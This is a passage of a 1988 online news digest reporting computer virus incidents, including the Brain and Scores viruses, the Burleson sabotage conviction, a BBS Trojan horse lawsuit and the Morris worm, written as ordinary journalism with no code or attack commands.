+applications, such as word processing and spreadsheet programs. + EDS Corp. of Dallas, Texas was also infected with the Scores virus, but +managed to stop its spread. 
+ -- Cathryn Conroy + + + +FRIDAY THE 13TH "VIRUS" FIZZLES + + (May 14) + Good morning, computerdom! It's Saturday the 14th and we're all still here. At +least, we all SEEM to still be here, though some are saying it's too early to +tell for sure. + Yesterday, the first Friday the 13th of the year, was widely reported to be +the target date for the denotation of a computer virus called "Black Friday" +which was first discovered in the computers of the Hebrew University in +Jerusalem late last year. The virus, which was reported to have spread from +Jerusalem to computers around the world, was said to be designed to destroy +computer files on May 13. + However, no early reports of damage have surfaced. Computer experts in +Jerusalem told Associated Press writer Karin Laub that the so-called virus was +undone because most computer users were alerted in time. Hebrew University +researchers detected the virus on Dec. 24 because of a flaw in its design, +according to senior programmer Yisrael Radai. + Nonetheless, a few experts are saying that we aren't out of the woods yet. + For instance, Donn Parker of the SRI International research firm in Menlo +Park, Calif., told The Washington Post this morning that he hadn't heard of any +virus-related damage, "but we have been holding our breath. I think it will be a +dud, but we won't know until next week, and only then if people whose computers +go down talk about it." + Some software companies tackled the virus scare. AP reports that the Iris +software publisher of Tel Aviv developed an anti-virus program for the Israeli +computing community and sold 4,000 copies before yesterday. President Ofer +Ahituv estimated that 30 percent of his 6,000 customers, most of them +businesses, had been infected by the Black Friday virus. + Meanwhile, some are saying the apparent fizzle of the virus is what they +expected all along. + "Viruses are like the bogyman," said Byron C. 
Howes, a computer systems +manager at the University of North Carolina at Chapel Hill. Speaking with AP, he +compared programmers who believe in viruses to "people who set little bowls of +milk outside our doors to feed the dwarfs." + Barry B. Cooper, owner of Commercial Software in Raleigh, N.C., agreed. "I +just think that the whole thing is a joke," like the prediction by medieval seer +Nostradamus of a major earthquake on May 8, 1988. "That didn't come true, and +this won't come true." + --Charles Bowen + + +R.I. NEWSPAPER DISLODGES VIRUS + + (May 16) + The Providence, R.I., Journal-Bulletin says it worked for the past week and a +half to stamp out a "virus" that infected an in-house personal computer network +used by reporters and editors, but not before the virus destroyed one reporter's +data and infected scores of floppy disks. + Writing in The Journal, Jeffrey L. Hiday said the virus was "a well-known, +highly sophisticated variation called the 'brain' virus, which was created by +two brothers who run a computer store in Lahore, Pakistan." + Variations of the virus, he noted, have been discovered at companies and +colleges across the country, including, last week, Bowie State College in +Maryland, where it destroyed five students' disks. Online Today reported on +April 23 that a similar Pakistan-based virus infected a student system used at +Miami University in Ohio, threatening to wipe out term papers stored there. + Apparently this is the first time a virus has invaded a US newspaper's system. + Hiday said The Journal contacted one of the Pakistan brothers by phone, who +said he created this particular virus merely to keep track of software he wrote +and sold, adding that he did not know how it got to the United States. + However, Hiday added, "US computer programming experts ... believe the +Pakistanis developed the virus with malicious intent. 
The original version may +be relatively harmless, they point out, but its elegance lends itself to +alterations by other programmers that would make it more destructive." + The newspaper says it discovered the virus on May 6 when a message popped up +on computer screens reading, "Welcome to the Dungeon. ... Beware of this VIRUS. +Contact us for vaccination." The message included a 1986 copyright date, two +names (Basit and Amjad), a company (Brain Computer Services), an address (730 +Nizam Block Allama Iqbal in Lahore, Pakistan) and three phone numbers. + Journal-Bulletin systems engineer Peter Scheidler told Hiday, "I was sort of +shocked. I never thought I'd see a virus. That's something you read about." + The virus infected only the PC network; neither the paper's Atex news-editing +system nor its IBM mainframe that supports other departments were affected. + Hiday says the newspaper now is taking steps to protect itself against another +virus attacks. It has tightened dissemination of new software and discussed +installing "anti-virus" devices. In addition, computer users have been warned +not to use "foreign" software, and reporters have been instructed to turn their +computers off and then on again before inserting floppy disks. + --Charles Bowen + + +EPA MACINTOSHES RECOVER FROM VIRUS + + (May 18) + Although Apple Macintosh computers at the Environmental Protection Agency were +recently plagued with a virus, all of them seem to be on the mend now. + According to Government Computer News, the computers were vaccinated with +Virus Rx, a free program issued by Apple Computer Inc. to help users determine +if their hard disks have been infected. Apple has begun an educational campaign +to promote "safe computing practices," Apple spokeswoman Cynthia Macon told GCN. + Virus Rx is available on CompuServe in the Apple Developers Forum (GO APPDEV) +in Data Library 8 under the name VIRUS.SIT. 
+ Macon said the best long-term response to viruses "is to make users aware of +steps they can take to protect themselves." These include backing up data files, +knowing the source of programs and write-protecting master disks. Other steps +include booting from a floppy disk and running all programs from floppies rather +than installing and running them from the hard disk. + EPA is having some trouble with reinfection. Since up to 20 people may use one +Macintosh, someone may unknowingly insert a virus-plagued disk into a clean +machine. "It's like mono. You just never get rid of it," said Leslie Blumenthal, +a Unisys Corp. contract employee at EPA. + FBI agents in Washington, D.C. and San Jose, Calif. are investigating the +spread of the Macintosh virus, notes GCN. + -- Cathryn Conroy + + +CONGRESS CONSIDERS VIRUS PROBLEMS + + (May 19) + Computer viruses have come to the attention of Congress and legislators would +like to be assured that US defense computers are safe from the replicating +little bugs. Although defense systems can't be reached simply by telephoning +them, a virus could be contracted through an infected disk containing +non-essential information. + The Defense Authorization Bill for FY 1989 is likely to direct the Defense +Department (DoD) to report on its methods for handling potential viral +infections. Congress also wants to know what DoD has done about safeguarding +military computers. They'd like some assurance that the Defense Department also +has considered situations where a primary contractor's computer could be +infected and subsequently endanger DoD's own computers. + Anticipating future hearings, Congressional staffers are soliciting comments +from knowledgeable users as to what the report to Congress should cover. +Interested parties should forward their comments to Mr. Herb Lin, House Armed +Services Committee, 2120 Rayburn House Office Building, Washington DC 20515. +Further information is available by calling 202/225-7740. 
All comments will be +kept in confidence. + --James Moran + + +TEXAN STANDS TRIAL FOR ALLEGEDLY INFECTING SYSTEM WITH "VIRUS" + + (May 24) + In Fort Worth, Texas, a 39-year-old programmer is to stand trial July 11 on +felony charges that he intentionally infected an ex-employer's system with a +computer "virus." If convicted, he faces up to 10 years in prison. + The man, Donald Gene Burleson, apparently will be the first person ever tried +under the state's tougher computer sabotage law, which took effect Sept. 1, +1985. + Dan Malone of the Dallas Morning News broke the story this morning, reporting +on indictments that accuse Burleson of executing programs "designed to interfere +with the normal use of the computer" and of acts "that resulted in records being +deleted" from the systems of USPA and IRA Co., a Fort Worth-based national +securities and brokerage. + The paper quoted police as saying the electronic interference was a "massive +deletion" of more than 168,000 records of sales commissions for employees of the +company, where Burleson once worked as a computer security officer. + Burleson currently is free on a $3,000 bonding pending the trial. + Davis McCown, chief of the Tarrant County district attorney's economic crimes +division, said of the alleged virus, "You can see it, but you can't see what it +does -- just like a human virus. It had the ability to multiply and move around +and was designed to change its name so it wouldn't be detected." + McCown also told Malone he wanted to make sure "that this type of criminal +understands that we have the ability to make these type of cases; that it's not +so sophisticated or complicated that it's above the law." + Company officials first noticed a problem on Sept. 21, 1985. Says the Dallas +newspaper, "Further investigation revealed that an intruder had entered the +building at night and used a 'back-door password' to gain access to the +computer. ... 
Once inside, the saboteur covered his tracks by erasing computer +logs that would have followed his activity, police said. With his access to the +computer complete, the intruder manually deleted the records." + Authorities say that only a few of the 200 workers in the USPA home office -- +including Burleson -- had access and the knowledge needed to sabotage the +system. + Earlier USPA was awarded $12,000 by a jury in a civil lawsuit filed against +Burleson. + --Charles Bowen + + +FBI CALLED TO PROBE VIRUS CASE + + (July 4) + The FBI has been called in by NASA officials to investigate an alleged +computer virus that has destroyed data on its personal computers and those of +several other government agencies. + The New York Times reported this morning that the rogue program -- apparently +the so- called "Scores" virus that surfaced last April -- was designed to +sabotage data at Dallas' Electronic Data Systems. The paper said the virus did +little damage to the Texas company but did wreak havoc on thousands of PCs +nationwide. + The Times quoted NASA officials as saying the FBI was called in because, even +though damage to government data was limited, files were destroyed, projects +delayed and hundreds of hours were spent tracking the culprit at various +government agencies, including NASA, the Environmental Protection Agency, the +National Oceanic and Atmospheric Administration and the US Sentencing +Commission. + NASA says it doesn't know how the program, which damaged files from January to +May, spread from the Texas EDS firm to PC networks nor whether the virus was +deliberately or accidentally introduced at government agencies. + Meanwhile, the Times quoted experts as saying that at least 40 so-called +"viruses" now have been identified in the United States, defining a virus as a +program that conceals its presence on a disk and replicates itself repeatedly +onto other disks and into the memory of computers. 
+ As reported here in April, the Scores virus was blamed for infecting hundreds +of Apple Macintosh computers at NASA and other facilities in Washington, +Maryland and Florida. + The Times says the spread of the virus was exacerbated when private +contractors in Washington and North Carolina inadvertently sold dozens of +computers carrying the virus to government agencies. The virus spread for as +long as two months and infected networks of personal computers before it was +discovered. + --Charles Bowen + + + +NEW MEXICO BBS SUES OVER VIRUS + + (Aug. 17) + The operator of a New Mexico computer bulletin board system has filed what may +be the first federal suit against a person accused of uploading a computer +"virus." + William A. Christison, sysop of the Santa Fe Message BBS, alleges in his suit +that a man named Michael Dagg visited his board in the early hours of last May 4 +and "knowingly and intentionally" uploaded a digitally-infected file called +"BBSMON.COM." + The suit says Christison "checked the program before releasing it to the +public and discovered that it was a 'Trojan Horse'; i.e., it appeared to be a +normal program but it contained hidden commands which caused the program to +vandalize Plaintiff's system, erasing the operating system and damaging the file +allocation tables, making the files and programs stored in the computer +unusable." + Christison says that the defendant re-visited the BBS nine times between May 5 +and May 12, sometimes logging in under a pseudonym. "Several of these times," +the suit says, "he sent in messages and on May 7, 1988, he knowingly and +intentionally sent in by modem a program of the same name, BBSMON.COM, as the +original 'Trojan Horse' computer program." + Through attorney Ann Yalman, Christison asks the court to grant $1,000 for +each Trojan Horse violation and to enjoin the defendant "from sending 'Trojan +Horses' or 'viruses' or other vandalizing programs to Plaintiff or anyone else." 
+ A copy of the Santa Fe Message's suit has been uploaded to CompuServe's IBM +Communications Forum. To see it, visit the forum by entering GO IBMCOM at any +prompt. The ASCII file is VIRUS.CHG in forum library 0. + Also, you can reach Christison BBS directly with a modem call to 505/988-5867. + --Charles Bowen + + + +VIRUS FIGHTERS FIGHT EACH OTHER + + (Aug. 31) + Two groups that mean to protect us in the fight against so-called computer +"viruses" seem to be spending rather a lot of their energies fighting each +other. + "I personally know most of the people in this industry and I have never seen +this kind of animosity," Brian Camenker of the Boston Computer Society tells +business writer Peter Coy. + The bickering grew louder on Monday in page-one article in MIS Week trade +newspaper in which each side accused the other of using sloppy techniques and +manipulating the testing process for its own purposes. + Says Coy, "The intensity of the debate has left some software developers +disgusted with the whole business." + The argument, which centers around fair evaluation anti-virus "vaccine" +software, pits the 2- month-old Computer Virus Industry Association led by John +McAfee, president of InterPath Corp. of Santa Clara, Calif., against what Coy +terms "a loose collection of other computer experts" led by consultant Jon R. +David of Tappan and editor Harold Highland of Computers & Security magazine. + "Customers and producers agree on the need for an independent panel of experts +to review the (vaccine) software," Coy comments. "The question splitting the +industry is who should be in charge." + CVIA is pulling together an independent university testing panel made up of +representatives of Pace University, Adelphi University and Sarah Lawrence +College and headed by John Cordani, who teaches computer science at Adelphi and +Pace. 
However, David and Highland say these people don't have the necessary +credentials and that McAfee's InterPath products will have an advantage in the +testing because McAfee invented a virus simulator that will be used as a testing +mechanism. + Meanwhile, Highland says he's getting funding from his publisher, Elsevier +Advanced Technology Publications, for his own review of anti-viral software, but +adds he isn't interested in operating an ongoing review board. + --Charles Bowen + + + +VIRUS TRIAL BEGINS IN FORT WORTH + + (Sept. 7) + A 40-year-old Texas programmer has gone on trial this week, accused of using a +"virus" to sabotage thousands of computer records at his former employer's +business. + If convicted in what is believed to be the nation's first virus-related +criminal trial, Donald G. Burleson faces up to 10 years in jail and a $5,000 +fine. + Reporting from the state criminal district court in Fort Worth, Texas, The +Associated Press notes Burleson was indicted on charges of burglary and harmful +access to a computer in connection with damage to data at USPA & IRA Co. +securities firm two days after he was fired. The trial is expected to last about +two weeks. + USPA, which earlier was awarded $12,000 in a civil suit against Burleson, +alleges the defendant went into its offices one night and planted a virus in its +computer records that, says AP, "would wipe out sales commissions records every +month. The virus was discovered two days later, after it had eliminated 168,000 +records." + --Charles Bowen + + +VIRUS ATTACKS JAPANESE NETWORK + + (Sept. 14) + Japan's largest computer network -- NEC Corp.'s 45,000- subscriber PC-VAN +service -- has been infected by a computer "virus." + McGraw-Hill News quotes a NEC spokesman as saying that over the past two weeks +13 different PC- VAN users have reported virus incidents. 
+ Subscribers' user IDs and passwords "were apparently stolen by the virus +planter when the members accessed one of the service's electronic bulletin +boards," MH says. "The intruder then used the information to access other +services of the system and charged the access fees to the password holders." + NEC, which says it has not yet been able to identify the virus planter, gave +the 13 subscribers new user IDs and passwords to check the proliferation of the +virus. + --Charles Bowen + + +JURY CONVICTS PROGRAMMER OF VIRUS + + (Sept. 20) + After deliberating six hours, a Fort Worth, Texas, jury late yesterday +convicted a 40-year-old programmer of planting a "virus" to wipe out 168,000 +computer records in revenge for being fired by an insurance firm. + Donald Gene Burleson is believed to be the first person convicted under +Texas's 3-year-old computer sabotage law. The trial, which started Sept. 6, also +was among the first of its kind in the nation, Judge John Bradshaw told the +Tarrant County jury after receiving its verdict. + The Associated Press says jurors now are to return to State District Court to +determine the sentence. + Burleson, an Irving, Texas, resident, was found guilty of harmful access to a +computer, a third-degree felony with a maximum penalty of 10 years in prison and +a $5,000 fine. However, as a first-time offender, Burleson also is eligible for +probation. + As reported here earlier, Burleson was alleged to have planted a rogue program +in computers used to store records at USPA and IRA Co., a Fort Worth insurance +and brokerage firm. + During the trial, prosecutor Davis McCown told the jury the virus was +programmed like a time bomb and was activated Sept. 21, 1985, two days after +Burleson was fired as a programmer at the firm because of alleged personality +conflicts with other employees. + AP quoted McCown as saying, "There were a series of programs built into the +system as early as Labor Day (1985). 
Once he got fired, those programs went +off." + McCown added the virus was discovered two days later after it had eliminated +168,000 payroll records, holding up paychecks to employees for more than a +month. + Expert witnesses also testified in the three-week trial that the virus was +entered in the system via Burleson's terminal by someone who used Burleson's +personal access code. + However, the defense said Burleson was set up by someone else using his +terminal and code. Says AP, "Burleson's attorneys attempted to prove he was +vacationing in another part of the state with his son on the dates in early +September when the rogue programs were entered into the system. But prosecutors +presented records showing that Burleson was at work and his son was attending +school on those dates." + The Fort Worth Star-Telegram reports that also during the trial, Duane Benson, +a USPA & IRA senior programmer analyst, testified the automated virus series, +which was designed to repeat itself periodically until it destroyed all the +records in the system, never was automatically activated. Instead, Benson said, +someone manually set one of the programs in motion Sept. 21, 1985, deleting the +records, then covering his or her tracks by deleting the program. + Prosecutor McCown says data damage in the system could have amounted to +hundreds of thousands of dollars had the virus continued undetected. + As reported here earlier, Burleson also has lost a civil case to USPA in +connection with the incident. That jury ordered him to pay his former employers +$12,000. + Following the yesterday's verdict, McCown told Star-Telegram reporter Martha +Deller, "This proves (virus damage) is not an unprosecutable offense. It may be +hard to put a case together, but it's not impossible." + --Charles Bowen + + +UNIVERSITY PROFESSORS ATTACK COMPUTER VIRUSES + + (Sept. 
30) + Because they have not been given access to the National Security Agency's +anti-virus research, several university- based computer experts are planning to +begin their own testing and validating of software defenses against computer +viruses, reports Government Computer News. + Led by John Cordani, assistant professor of information systems at Adelphi +University, the results will be made public, unlike those being researched by +NSA. The work being done by the Department of Defense is too classified for use +by the general computer community. + GCN notes that computer viruses are hard-to-detect programs that secretly +replicate themselves in computer systems, sometimes causing major damage. + Cordani and five other academics will establish secure laboratories to study +viruses in three New York colleges: Adelphi University, Pace University and +Sarah Lawrence College. The lab will test anti-virus software developed by +companies that are members of the Computer Virus Industry Association, a +consortium of anti-virus defense developers. + The group will then publish what it is calling "consumer reports" in the media +and on electronic bulletin board systems. Once sufficient research is completed, +more general grading systems will be applied, said Cordani. In addition, the lab +will use viruses sent to them by the CVIA to develop classification algorithms +to aid in describing a virus' actions and effects. + -- Cathryn Conroy + + + +SECOND VIRUS FOUND AT ALDUS CORP. + + (Oct. 21) + For the second time this year, a computer "virus" has been found in a +commercial program produced by Seattle's Aldus Corp. The infection was found in +the latest version of the FreeHand drawing software, the same software that was +invaded by a different virus last March. 
+ An Aldus official told The Associated Press the company was able to prevent +the virus's spread to programs for sale to the public, but that an entire +computer network within Aldus' headquarters has been infected. + The virus was found in a version of the Apple Macintosh software that was sent +to specific users to be tested before going to market. One of the testers +discovered the virus, dubbed "nVir," and two days later, Aldus realized the +virus was in its own in-house network. + Said Aldus spokeswoman Jane Dauber, "We don't know where it came from. That is +the nature of the virus. You can't really track it." + AP says Aldus officials said the new virus has remained dormant so far, a tiny +program that merely attaches itself to other programs. + "We don't know why," Dauber said. "We don't know what invokes this virus. With +some of them, you have to launch the program a certain number of times," for the +virus to activate. + The company told the wire service that, while it does not know where the virus +originated, reports are that it apparently has infected at least one +unidentified East Coast university's computers. + Another Aldus spokeswoman, Laury Bryant, added, "You just can't always stop +these things from coming in the door. But what we have done is to set up systems +which eliminate them before they are actually in full version, shrink-wrap +software and stop them from going out the door." + Last March, in what was apparently the first instance of an infection in +commercial software, a virus called the "March 2 peace message" was found in +some FreeHand programs. The invasion caused Aldus to recall or rework thousands +of packages of the new software. + --Charles Bowen + + + +MAN SENTENCED IN NATION'S FIRST VIRUS-RELATED CRIMINAL COURT CASE + + (Oct. 
23) + Donald Gene Burleson, the first person ever convicted of using a computer +"virus" to sabotage data, has been sentenced to seven years' probation and +ordered to pay back nearly $12,000 to his former employer. + The 40-year-old Irving, Texas, man's attorney told United Press International +he will appeal the sentenced handed down late Friday by District Judge John +Bradshaw in Fort Worth, Texas. + As reported earlier, Burleson was convicted Sept. 19 of the third-degree +felony, the first conviction under the new Texas state computer sabotage law. He +was accused of infecting the computers of USPA & IRA, a Fort Worth insurance and +securities firm a few days after his firing Sept. 18, 1985. + Burleson could have received two to 10 years in prison and a fine up to $5,000 +under the 1985 law. As a first-time offender, however, he was eligible for +probation. + As reported during last month's trial, a few days after Burleson's firing in +1985, company officials discovered that 168,000 records of sales commissions had +been deleted from their system. + Burleson testified that he was more than 300 miles away from Fort Worth on +Sept. 2 and Sept. 3 when the virus was created. However, UPI notes that evidence +showed that his son was not traveling with him as he said but in school, and +that a credit card receipt Burleson said proved he was in Rusk on Sept. 3 turned +out to be from 1987. + Associated Press writer Mark Godich quoted Burleson's lawyer, Jack Beech, as +saying he had asked for five years' probation for his client, and restitution +not to exceed $2,500. + Godich also observed that the Burleson's conviction and sentencing "could pave +the way for similar prosecutions of people who use viruses." + Chairman John McAfee of the Computer Virus Industry Association in Santa, +Clara, Calif., told AP the Texas case was precedent-setting and that it's rare +that people who spread computer viruses are caught. 
He added his organization +had documented about 250,000 cases of sabotage by computer virus. + --Charles Bowen + + +BRAIN VIRUS HITS HONG KONG + + (Oct. 30) + According to Computing Australia, a major financial operation in Hong Kong was +infected with a version of the "Brain" virus. This is the first reported +infection of a commercial business in the East. + Business International, a major financial consulting firm in Hong Kong, is +believed not to have suffered any major damage. A company spokeswoman played +down the appearance of the virus and said that no data had been lost. + The "brain" virus has been reported as a highly sophisticated piece of +programming that was created by two men in Lahore, Pakistan who run the Brain +Computer Services company. It's last reported appearance in the US was during +May when it popped up at the Providence, R.I., Journal- Bulletin newspaper. + --James Moran + + +60 COMPUTER FIRMS SET VIRUS GOALS + + (Nov. 2) + Some 60 computer companies have organized a group to set guidelines that they +say should increase reliability of computers and protect the systems from +so-called "viruses." + The Reuter Financial News Service says that among firms taking part in the +movement are Microsoft Corp., 3Com Inc., Banyan Systems and Novell Inc. At the +same time, though, declining to join the efforts are such big guys as IBM and +Digital Equipment Corp. + Reuter reports, "The companies said the measures would promote competition +while allowing them to cooperate in making computers more reliable and less +vulnerable to viruses." + However, the firms apparently have shied away from specific proposals, instead +issuing broad recommendations that leave it up to each company to develop the +technology needed to prevent the spread of viruses, Reuter said. + --Charles Bowen + + +THOUSANDS OF UNIVERSITY, RESEARCH COMPUTERS STUCK IN MAJOR ASSAULT + + (Nov. 
4) + Thousands of Unix-based computers at universities and research and military +installations were slowed or shut down throughout the day yesterday as a rogue +program ripped through international networks, an incident proclaimed by some to +be the largest assault ever on the nation's computers. + No permanent damage or security breaches appear to have occurred during the +attack. This led some to say this morning that the intrusion was not actually a +computer "virus" but rather was a "worm" program, in that it apparently was +designed to reproduce itself, but not to destroy data. + Science writer Celia Hooper of United Press International says the virus/worm +penetrated the computers through a "security hole" in debugging software for +electronic mail systems that connect Unix-based computers, evidently then moving +primarily through ARPAnet (the Advanced Research Projects Agency Network) and +NSFnet (network of the National Science Foundation) that link 2,000 computers +worldwide. + At other systems: + -:- The virus/worm also apparently invaded the Science Internet network that +serves many labs, including NASA's Jet Propulsion Laboratory in Pasadena, Calif. + -:- NASA spokesman Charles Redmond said there were no reports of the space +agency's network, Space Physics Analysis Network (SPAN), being affected by the +attack, but he added that SPAN was linked to some of the infected networks. + Meanwhile, The New York Times this morning reported an anonymous call from a +person who said his associate was responsible for the attack and that the +perpetrator had meant it to be harmless. + The caller told the newspaper that his associate was a graduate student who +made a programing error in designing the virus, causing the intruder to +replicate much faster than expected. Said The Times, "The student realized his +error shortly after letting the program loose and ... was now terrified of the +consequences." 
+ UPI's Hooper says the virus/worm intrusion was detected about 9 p.m. Eastern +Time Wednesday at San Francisco's Lawrence Livermore National Laboratory, one of +two such labs where nuclear weapons are designed. Spokeswoman Bonnie Jean +Barringer told UPI said the invasion "was detected and contained within two +hours." + The rogue program evidently spread through a flaw in the e- mail system of the +networks. Hooper said it quickly penetrated Air Force systems at the NASA Ames +Research Center in Mountain View, Calif., and systems at the Massachusetts +Institute of Technology, the University of California at Berkeley, the +University of Wisconsin, the University of Chicago, the University of Michigan, +the University of Rochester, the University of Illinois and Rutgers, Boston, +Stanford, Harvard, Princeton, Columbia, Cornell and Purdue universities. + Charley Kline, senior research programmer with the Computing Services Office +at the University of Illinois at Urbana-Champaign, Ill., told Associated Press +writer Bernard Schoenburg, "This is the first time that I know of that (a virus +infection) has happened on this scale to larger systems." + Kline agreed the virus traveled between computer systems through e-mail and, +once the messages were received, they linked up to command controls and told the +local computers to make copies of the virus. Kline said the copies then sought +out other connected devices. + He also said that as far as he knows, only locations using Digital Equipment +Corp.'s VAX computers or those systems made by Sun Microsystems Inc. were +affected. He estimated about 75 percent of all national networks use such +systems. + Schoenburg also noted that all the affected computers use the BSD Unix +operating system, written at University of California/Berkeley as a modified +version AT&T's original Unix. 
+ Commenting on the situation, Chairman John McAfee of the new Computer Virus +Industry Association in Santa Clara, Calif., told AP writer Paul A. Driscoll, +"The developer was clearly a very high-order hacker (because) he used a flaw in +the operating systems of these computers." + Research director Todd Nugent of the University of Chicago's computing +department told UPI computer operators across the country were tipped off to the +invasion when they noticed their Unix-based systems running unusually slowly. +Thmlachines turned out to be bogged down by loads of viral programs. Nugent +said that in one machine he had disconnected, the virus appeared to have +replicated itself 85 times. + Today, in the morning-after, systems operators were fighting back on several +fronts: + -:- First, a software "patch" has been developed to fend off the virus/worm. +Spokesman Bill Allen of the University of Illinois at Urbana-Champaign told +UPI's Hooper, "The strategy is to shut off various (infected) computers from the +network then sanitize them, purging the virus with a patch program." Hooper said +the patches, which find and excise the virus/worm from the computer and then +plug the hole through which it entered, now are circulating on campuses and have +been posted nationally on computer bulletin board systems. + -:- Secondly, the Defense Communications Agency has set up an emergency center +to deal with the problem. However, The New York Times noted that no known +criminal investigations are under way. + NSFnet Program Manager Al Thaler told UPI he considered the virus/worm "a +mean-spirited, vicious thing that interferes severely with the communications +network our research computers live in. We are angry." Even though it will be +hard to determine who started the virus/worm, Thaler said, "We are going to +try." + Finally, McAfee of the virus group told AP that this virus/worm was rare +because it infested computers at major institutions, not just personal +computers. 
"Any hacker in the world can infect personal computers," McAfee said, +"but in this case, the person who did this would have had to have been +physically at the site of one of the computers belonging to the network." He +added, though, that chances of identifying that person were "extremely slim." + --Charles Bowen + + + +REPORTS NAME 23-YEAR-OLD CORNELL STUDENT AS THE AUTHOR OF "VIRUS" + + (Nov. 5) + A 23-year-old Cornell University student and the son of a government computer +security expert now is said to be the person who planted that "virus" that +stymied some 6,000 Unix- based computers across the nation for more than 36 +hours this week. + The New York Times this morning quoted two sources as identifying the suspect +as Robert T. Morris Jr., a computer science graduate student. The paper says +Cornell University authorities found that the young man possessed unauthorized +computer codes. + The young man's father, Robert Morris Sr., the Silver Springs, Md., chief +scientist at the National Computer Security Center in Bethesda, Md., +acknowledged this morning that "it's possible" his son was responsible for the +rapidly-replicating virus that started crashing international networks late +Wednesday night. + However, Morris Sr., who is known for security programming in Unix systems, +told science writer Celia Hooper of United Press International that he had "no +direct information" on his son's involvement. He added he had not spoken to his +son in several days and was unaware of his whereabouts. + The elder Morris also told The Times that the virus "has raised the public +awareness to a considerable degree. It is likely to make people more careful and +more attentive to vulnerabilities in the future." + As reported here yesterday (GO OLT-391), the incident, in which thousands of +networked computers at universities and research and military installations were +halted or slowed, is said to be the largest assault ever on the nation's +computers. 
However, no permanent damage or security breaches appear to have +occurred during the attack. + Of Morris Jr.'s alleged involvement, Cornell Vice President M. Stuart Lynn +released a statement late last night saying the Ithaca, N.Y., university has +uncovered some evidence. For instance, "We are investigating the (computer +files) to see if the virus was inserted in the system at Cornell. So far, we +have determined that this particular student's account does hold files that +appear to have passwords for some computers at Cornell and Stanford University +to which he's not entitled. + "We also found that his account contains a list of passwords substantially +similar to those contained in the virus," said Lynn. He added that students' +accounts show which computers they had accessed and what they had stored. The +university is preserving all pertinent computer tapes and records to determine +the history of the virus. + Morris Jr. himself has not been reached for comment. Associated Press writer +Douglas Rowe says the young man is believed to have flown to Washington, D.C., +yesterday and plans to hire a lawyer and to meet with officials in charge of the +infected computer networks to discuss the incident. + Rowe also quotes computer scientists as saying the younger Morris worked in +recent summers at the AT&T's Bell Laboratories, where one of his projects +reportedly was rewriting the communications security software for most computers +that run AT&T's Unix operating system. + AP also notes that computer scientists who now are disassembling the virus to +learn how it worked said they have been impressed with its power and cleverness. + Of this, Morris' 56-year-old father told the Times that the virus may have +been "the work of a bored graduate student." + Rowe says that when this comment was heard back at Cornell, Dexter Kozen, +graduate faculty representative in the computer science department, chuckled and +said, "We try to keep them from getting bored. 
I guess we didn't try hard +enough." + Meanwhile, there already is talk of repercussions if Morris is determined to +be responsible for the virus. + Lynn said, "We certainly at Cornell deplore any action that disrupts computer +networks and computer systems whether or not it was designed to do so. And +certainly if we find a member of the Cornell community was involved, we will +take appropriate disciplinary action." He declined to specify what the action +would be. + In addition, federal authorities may be calling. Speaking with reporter Joseph +Verrengia of Denver's Rocky Mountain News late yesterday, FBI spokesman William +Carter said a criminal investigation would be launched if it is determined +federal law was violated. He said the bureau will review the Computer Fraud and +Abuse Act, which deals with unauthorized access to government computers or +computers in two or more states. Conviction carries a maximum penalty of 10 +years in prison. + --Charles Bowen + + +ROBERT MORRIS' FRIENDS SAY NO MALICE MEANT WITH ALLEGED VIRUS + + (Nov. 7) + Friends of a Cornell University graduate student suspected of creating a +"virus" that jammed some 6,000 networked computers for 36 hours last week say +they believe he intended no malice and that he also frantically tried to warn +operators after he saw his programming experiment had gone terribly awry. + Twenty-three-year-old Robert Tappen Morris Jr. is said to now be in contact +with his father -- Robert T. Morris Sr., a computer security expert with the +super secret National Security Agency - - and is expected to meet this week with +FBI agents after hiring a lawyer. + As reported earlier, the virus, which started Wednesday night, spread along +several major networks and, for about 36 hours, created widespread disturbances +in the unclassified branch of the military's defense data system, as well as in +thousands of university and research computer systems. However, apparently no +information was lost or damaged. 
+ Morris Sr. told Associated Press writer David Germain that he met with FBI +agents for about an hour Saturday to explain why his son will not immediately +comply with their request for more information. The elder Morris said the family +has had preliminary discussions with an attorney and expects to hire one by +today. He said his son won't be available for a comment until at least tomorrow +or Wednesday. + The New York Times yesterday quoted Morris' friends as saying he had spent +weeks creating the virus. However, the paper said that by all accounts Morris +meant no harm to the systems; instead, the virus, created as an intellectual +challenge, was supposed to lie dormant in the systems. + A friend alleges Morris discovered a flaw in the electronic mail section of +the Unix 4.3 operating system, a modification of AT&T's original Unix produced +by the University of California at Berkeley. When he saw the flaw allowed him to +secretly enter the networked Unix computers, Morris literally jumped onto the +friend's desk and paced around on top of it, the Times reported. + Cornell instructor Dexter Kozen told AP the flaw was "a gaping hole in the +system that I'm amazed no one exploited before." While the loophole was not +evident before the virus was unleashed, "in retrospect it's really quite +obvious," Kozen said. + Incidentally, the programmer who designed Unix's e-mail program through which +the virus apparently entered told the Times this weekend that he had forgotten +to close a secret "back door." Eric Allman said he created the opening to make +adjustments to the program, but forgot to remove the entry point before the +program was widely distributed in 1985. He was working for a programming +organization at the University of California/Berkeley at the time. + Friends and others say Morris' original vision was to spread a tiny program +throughout and have it secretly take up residence in the memory of each computer +it entered, the Times said. 
+ Working virtually around the clock, Morris reportedly made a single +programming error involving one number that ultimately jammed more than 6,000 +computers by repeating messages time after time. + AP's Germain said Morris reportedly went to dinner after setting the program +loose Wednesday night and then checked it again before going to bed. Discovering +his mistake, Morris desperately worked to find a way to stop the virus' spread. + However, "his machines at Cornell were so badly clogged he couldn't get the +message out," said Mark Friedell, an assistant professor of computer science at +Harvard University, where Morris did his undergraduate studies. + AP says that, panicked, Morris called Andrew Sudduth, systems manager at +Harvard's Aiken Laboratory. He asked Sudduth to send urgent messages to a +computer bulletin board system, explaining how to defeat the virus. + Sudduth told The Washington Post, "The nets were like molasses. It took me +more than an hour to get anything out at all." + At a press conference this weekend, Cornell University officials said that, +while the computer virus was traced to their institution, they actually had no +evidence to positively identify Morris as the virus creator. + Said Dean Krafft, Cornell's computer facilities manager, "We have no +fingerprints. We have no eyewitness, but it was created on his computer +account." Krafft added that Morris' computer account holds files that appear to +have unauthorized passwords for computers at Cornell and Stanford University. + In addition, Cornell Vice President M. Stuart Lynn said the origin of the +program is hard to investigate, and it may be impossible to trace the virus back +to Morris. "At this stage we're simply not in a position to determine if the +allegations are true," Lynn said, adding he did not know how long the +investigation would take. 
